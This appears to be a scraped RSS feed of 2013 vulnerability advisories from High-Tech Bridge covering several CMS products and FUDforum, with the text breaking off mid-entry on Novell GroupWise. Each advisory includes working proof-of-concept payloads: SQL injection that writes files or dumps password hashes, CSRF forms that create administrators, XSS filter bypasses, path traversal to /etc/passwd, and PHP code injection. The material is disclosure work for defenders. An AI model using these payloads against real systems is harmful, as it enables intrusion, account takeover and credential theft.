https://www.htbridge.com/advisory/enSat, 18 May 2013 23:39:36 +0200Sat, 18 May 2013 23:39:36 +0200HTBridge RSS Generator 0.9560https://www.htbridge.com/images/high_tech_bridge_logo2.gifhttps://www.htbridge.comhttps://www.htbridge.com/advisory/HTB23153<b>Product:</b> Jojo CMS v1.2<br><b>Vulnerability Type:</b> SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> The Jojo Team<br><b>Vendor Notification:</b> 2013-04-17 14:54:18<br><b>Public Disclosure:</b> May 15, 2013 <br><b>CVE References:</b> CVE-2013-3081, CVE-2013-3082<br> <b>CVSSv2 Base Scores:</b> 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Jojo CMS, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.<br /> <br /> <br /> 1) SQL Injection in Jojo CMS: CVE-2013-3081<br /> <br /> The vulnerability is caused by insufficient filtration of user-supplied input passed to the "X-Forwarded-For" HTTP header in "/articles/test/" URI. A remote unauthenticated attacker can send a specially crafted HTTP request and execute arbitrary SQL commands in application’s database.<br /> <br /> The PoC code below will create a file "/var/www/file.php" containing content of "comment" table (if web and database server configurations allow):<br /> <br /> <font color=#606060>POST /articles/test/ HTTP/1.1<br /> X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' -- <br /> Content-Type: application/x-www-form-urlencoded<br /> Content-Length: 88<br /> <br /> name=name&amp;email=user%40mail.com&amp;website=&amp;anchortext=&amp;comment=comment&amp;submit=Post+Comment</font><br /> <br /> The above-mentioned PoC code can be used to execute arbitrary PHP code on the vulnerable system if the attacker creates a comment containing PHP code.<br /> <br /> Successful exploitation of the vulnerability requires that "jojo comments" plugin is enabled (disabled by default).<br /> <br /> <br /> 2) Cross-Site Scripting (XSS) in Jojo CMS: CVE-2013-3082<br /> <br /> The vulnerability exists due to insufficient filtration of user-supplied data passed to "search" HTTP POST parameter in "/forgot-password/" URI. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses the "alert()" JavaScript function to display user's cookies:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://jojo/forgot-password/&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;search&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">'&lt;<font color="#808000">script</font>&gt;</font>alert(document.cookike);<font color="#0000FF">&lt;/<font color="#808000">script&gt;</font>'</font></font>&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> https://www.htbridge.com/advisory/HTB23153Wed, 15 May 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23154<b>Product:</b> Exponent CMS v2.2.0 beta 3<br><b>Vulnerability Type:</b> SQL Injection [CWE-89], PHP File Inclusion [CWE-98]<br><b>Risk level: </b>High <img src="https://www.htbridge.com/images/risk3.png" style='margin-bottom:4px;'><br /><b>Creater:</b> Online Innovative Creations<br><b>Vendor Notification:</b> 2013-04-24 12:39:31<br><b>Public Disclosure:</b> May 15, 2013 <br><b>CVE References:</b> CVE-2013-3294, CVE-2013-3295<br> <b>CVSSv2 Base Scores:</b> 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.<br /> <br /> <br /> 1) SQL Injection in Exponent CMS: CVE-2013-3294<br /> <br /> The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.<br /> <br /> Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()':<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/index.php&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;main&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;action&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;login&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;int&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;module&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;login&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;password&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;password&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;src&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;'</font> UNION SELECT '<font color="#800000">&lt;? phpinfo(); ?&gt;</font></font>' INTO OUTFILE '/var/www/file.php' -- &quot;&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;username&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;'</font> UNION SELECT '<font color="#800000">&lt;? phpinfo(); ?&gt;</font></font>' INTO OUTFILE '/var/www/file.php' -- &quot;&gt;<br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <br /> The second PoC will attempt to create "/var/www/file.txt" file, containing usernames and hashed passwords of all application's users: <br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/index.php&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;main&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;action&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;login&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;int&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;module&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;login&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;password&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;password&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;src&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;'</font> UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- &quot;&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;username&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;'</font> UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- &quot;&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <br /> <br /> 2) PHP File Inclusion in Exponent CMS: CVE-2013-3295<br /> <br /> The vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to "/install/popup.php" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. <br /> <br /> The PoC code below will output the content of '/etc/passwd' file on vulnerable system:<br /> <br /> <font color=#606060>http://[host]/install/popup.php?page=../../../../etc/passwd%00</font>https://www.htbridge.com/advisory/HTB23154Wed, 15 May 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23151<b>Product:</b> UMI.CMS v2.9<br><b>Vulnerability Type:</b> Cross-Site Request Forgery [CWE-352]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> OOO Umisoft<br><b>Vendor Notification:</b> 2013-04-03 12:15:26<br><b>Public Disclosure:</b> May 8, 2013 <br><b>CVE Reference:</b> CVE-2013-2754<br> <b>CVSSv2 Base Score:</b> 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered CSRF vulnerability in UMI.CMS, which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks and create new administrator in the vulnerable application.<br /> <br /> <br /> 1) Cross-site Request Forgery (CSRF) in UMI.CMS: CVE-2013-2754<br /> <br /> The application allows authorized administrator to perform certain sensitive actions via HTTP requests without making proper validity checks to verify the source of these HTTP requests. This can be exploited to perform any actions with administrator privileges, such as adding new administrator to the system.<br /> <br /> A remote attacker can create a specially crafted webpage, trick a logged-in administrator to open it and create new user with administrative privileges.<br /> <br /> A basic CSRF exploit below will create new administrator with "csrfuser" as a login and "password" as a password:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/admin/users/add/user/do/&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;main&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][login]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;csrfuser&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][password][]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;password&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][e-mail]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;user@mail.com&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][is_activated]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][fname]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;username&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][groups][]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;data[new][groups][]&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;2&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.main.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>https://www.htbridge.com/advisory/HTB23151Wed, 08 May 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23141<b>Product:</b> GetSimple CMS v3.1.2<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79]<br><b>Risk level: </b>Low <img src="https://www.htbridge.com/images/risk1.png" style='margin-bottom:4px;'><br /><b>Creater:</b> get-simple.info<br><b>Vendor Notification:</b> 2013-01-23 11:24:13<br><b>Public Disclosure:</b> May 1, 2013 <br><b>CVE Reference:</b> CVE-2013-1420<br> <b>CVSSv2 Base Score:</b> 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in GetSimple CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks. The application has XSS filter, however it can be bypassed as demonstrated below.<br /> <br /> <br /> 1) Cross-Site Scripting (XSS) in GetSimple CMS: CVE-2013-1420<br /> <br /> 1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "id" HTTP GET parameter to "/admin/backup-edit.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses the "alert()" JavaScript function to display administrator's cookies: <br /> <br /> <font color=#606060>http://[host]/admin/backup-edit.php?p=1&amp;id=&quot;&gt;&lt;scri&lt;script&gt;&lt;/script&gt;pt&gt;alert(document.cookie);&lt;/scri&lt;script&gt;&lt;/script&gt;pt&gt;</font><br /> <br /> <br /> 1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "path" HTTP GET parameter to "/admin/upload.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses the "alert()" JavaScript function to display administrator's cookies: <br /> <br /> <font color=#606060>http://[host]/admin/upload.php?path=&quot;&gt;&lt;scri&lt;script&gt;&lt;/script&gt;pt&gt;alert(document.cookie);&lt;/scri&lt;script&gt;&lt;/script&gt;pt&gt;</font><br /> <br /> <br /> 1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "title" and "menu" HTTP GET parameters to "/admin/edit.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The exploitation examples below use the "alert()" JavaScript function to display administrator's cookies:<br /> <br /> <font color=#606060>http://[host]/admin/edit.php?title=&quot;&gt;&lt;scri&lt;script&gt;&lt;/script&gt;pt&gt;alert(document.cookie);&lt;/scri&lt;script&gt;&lt;/script&gt;pt&gt;</font><br /> <font color=#606060>http://[host]/admin/edit.php?menu=&quot;&gt;&lt;scri&lt;script&gt;&lt;/script&gt;pt&gt;alert(document.cookie);&lt;/scri&lt;script&gt;&lt;/script&gt;pt&gt;</font><br /> <br /> <br /> 1.4 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "path" and "returnid" HTTP GET parameters to "/admin/filebrowser.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.<br /> <br /> The exploitation examples below use the "alert()" JavaScript function to display administrator's cookies:<br /> <br /> <font color=#606060>http://[host]/admin/filebrowser.php?path=&quot;&gt;&lt;scri&lt;script&gt;&lt;/script&gt;pt&gt;alert(document.cookie);&lt;/scri&lt;script&gt;&lt;/script&gt;pt&gt;</font><br /> <font color=#606060>http://[host]/admin/filebrowser.php?returnid=&quot;&gt;&lt;scri&lt;script&gt;&lt;/script&gt;pt&gt;alert(document.cookie);&lt;/scri&lt;script&gt;&lt;/script&gt;pt&gt;</font><br /> https://www.htbridge.com/advisory/HTB23141Wed, 01 May 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23152<b>Product:</b> b2evolution v4.1.6<br><b>Vulnerability Type:</b> SQL Injection [CWE-89]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> b2evolution Group<br><b>Vendor Notification:</b> 2013-04-10 12:55:18<br><b>Public Disclosure:</b> May 1, 2013 <br><b>CVE Reference:</b> CVE-2013-2945<br> <b>CVSSv2 Base Score:</b> 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in b2evolution, which can be exploited to alter SQL requests passed to the vulnerable application's database.<br /> <br /> <br /> 1) SQL Injection in b2evolution: CVE-2013-2945<br /> <br /> The vulnerability exists due to insufficient validation of HTTP GET parameter "show_statuses" in "/blogs/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.<br /> <br /> Depending on database and system configuration, PoC code below will create a "/tmp/file.txt" file, containing MySQL version:<br /> <br /> <font color=#606060>http://[host]/blogs/admin.php?submit=Search&amp;ctrl=items&amp;tab=full&amp;blog=1&amp;show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --</font> <br /> <br /> <br /> This vulnerability is also exploitable via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit malicious web page with CSRF exploit.<br /> <br /> Basic CSRF exploit:<br /> <br /> <font color=#606060>&lt;img src=&quot;http://[host]/blogs/admin.php?submit=Search&amp;ctrl=items&amp;tab=full&amp;blog=1&amp;show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --&quot;&gt;</font> <br /> https://www.htbridge.com/advisory/HTB23152Wed, 01 May 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23150<b>Product:</b> KrisonAV CMS v3.0.1<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://www.krisonav.com<br><b>Vendor Notification:</b> 2013-03-27 12:17:18<br><b>Public Disclosure:</b> April 17, 2013 <br><b>CVE References:</b> CVE-2013-2712, CVE-2013-2713<br> <b>CVSSv2 Base Scores:</b> 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in KrisonAV CMS, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.<br /> <br /> <br /> 1) Cross-Site Scripting (XSS) vulnerability in KrisonAV CMS: CVE-2013-2712<br /> <br /> The vulnerability exists due to insufficient filtration of user-supplied data passed to "content" HTTP GET parameter via "/services/get_article.php" script. A remote attacker can trick a user to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses JavaScript "alert()" function to display user's cookies:<br /> <br /> <font color=#606060>http://[host]/services/get_article.php?content=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <br /> <br /> 2) Сross-Site Request Forgery (CSRF) vulnerability in KrisonAV CMS: CVE-2013-2713<br /> <br /> The vulnerability exists due to insufficient verification of the HTTP request origin in "/users_maint.html" script. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a new account with administrative privileges.<br /> <br /> PoC (Proof-of-Concept) below will create a new account with login "username" and password "password":<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">form</font> <font color="#800080">action</font>=<font color="#FF00FF">&quot;http://[host]/users_maint.html?itemid=52&amp;maint=1&amp;ccsForm=users&quot;</font> <font color="#800080">method</font>=<font color="#FF00FF">&quot;post&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;f1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;disabledCheckBox&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;1&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;username&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;username&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;password&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;password&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;groups_index&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;20&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;email&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;newuser@mail.com&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;hidden&quot;</font> <font color="#800080">name</font>=<font color="#FF00FF">&quot;Button_Insert&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Save&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;submit&quot;</font> <font color="#800080">id</font>=<font color="#FF00FF">&quot;btn&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">form</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font>&gt;</font><br /> document.f1.submit();<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font>https://www.htbridge.com/advisory/HTB23150Wed, 17 Apr 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23146<b>Product:</b> FUDforum v3.0.4<br><b>Vulnerability Type:</b> Code Injection [CWE-94]<br><b>Risk level: </b>High <img src="https://www.htbridge.com/images/risk3.png" style='margin-bottom:4px;'><br /><b>Creater:</b> FUDforum<br><b>Vendor Notification:</b> 2013-02-21 17:23:25<br><b>Public Disclosure:</b> April 3, 2013 <br><b>CVE Reference:</b> CVE-2013-2267<br> <b>CVSSv2 Base Score:</b> 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered vulnerability in FUDforum, which can be exploited to execute arbitrary PHP code on the target system.<br /> <br /> <br /> 1) PHP Code Injection in FUDforum: CVE-2013-2267<br /> <br /> The vulnerability exists due to insufficient validation of HTTP POST parameters "regex_str", "regex_str_opt" and "regex_with" in "/adm/admreplace.php" script before using them in the "preg_replace()" function. A remote administrator can send a specially crafted HTTP POST request, inject and execute arbitrary PHP code on the target system with privileges of the web server. <br /> <br /> The following PoC (Proof of Concept) code executes the "phpinfo()" function:<br /> <br /> <font color=#606060>POST /adm/admreplace.php HTTP/1.1<br /> Host: fudforum<br /> Referer: http://fudforum/adm/admreplace.php?&amp;SQ=8928823a5edf50cc642792c2fa4d8863<br /> Cookie: fud_session_1361275607=11703687e05757acb08bb3891f5b2f8d<br /> Connection: keep-alive<br /> Content-Type: application/x-www-form-urlencoded<br /> Content-Length: 111<br /> <br /> SQ=8928823a5edf50cc642792c2fa4d8863&amp;rpl_replace_opt=0&amp;btn_submit=Add&amp;btn_regex=1&amp;edit=&amp;regex_str=(.*)&amp;regex_str_opt=e&amp;regex_with=phpinfo()</font><br /> <br /> Successful exploitation of the vulnerability requires administrative privileges within the application.https://www.htbridge.com/advisory/HTB23146Wed, 03 Apr 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23149<b>Product:</b> Hero Framework v3.791<br><b>Vulnerability Type:</b> Cross-Site Scripting [CWE-79]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://www.heroframework.com/<br><b>Vendor Notification:</b> 2013-03-20 13:20:46<br><b>Public Disclosure:</b> April 10, 2013 <br><b>CVE Reference:</b> CVE-2013-2649<br> <b>CVSSv2 Base Score:</b> 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Hero Framework, which can be exploited to perform cross-site scripting attacks against vulnerable application.<br /> <br /> <br /> 1) Multiple XSS in Hero Framework: CVE-2013-2649<br /> <br /> 1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in "username" HTTP GET parameter passed to "/users/login" URL. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses JavaScript 'alert()' function to display user's cookies: <br /> <br /> <font color=#606060>http://[host]/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E</font><br /> <br /> <br /> 1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data in "error" HTTP GET parameter passed to "/users/forgot_password" URL. The parameter is passed to the vulnerable script in base64 encoding. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in victoms's browser in context of the vulnerable website.<br /> <br /> The exploitation example below uses the same XSS payload as above encoded in base64 to display user's cookies: <br /> <br /> <font color=#606060>http://[host]/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==</font>https://www.htbridge.com/advisory/HTB23149Wed, 10 Apr 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23131<b>Product:</b> Novell GroupWise v12.0.0.8586 and probably prior<br><b>Vulnerability Type:</b> Untrusted Pointer Dereference [CWE-822]<br><b>Risk level: </b>Critical <img src="https://www.htbridge.com/images/risk4.png" style='margin-bottom:4px;'><br /><b>Creater:</b> Novell Inc.<br><b>Vendor Notification:</b> 2012-11-26 12:43:40<br><b>Public Disclosure:</b> April 3, 2013 <br><b>CVE Reference:</b> CVE-2013-0804<br> <b>CVSSv2 Base Score:</b> 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered multiple untrusted pointer dereference vulnerabilities in Novell GroupWise, which could be exploited to compromise a remote system.<br /> <br /> <br /> 1) Untrusted Pointer Dereference in Novell GroupWise: CVE-2013-0804<br /> <br /> 1.1 The vulnerability exists due to an untrusted pointer dereference error in the <b>InvokeContact()</b> method within the ActiveX control (<b>gwabdlg.dll</b>, GUID 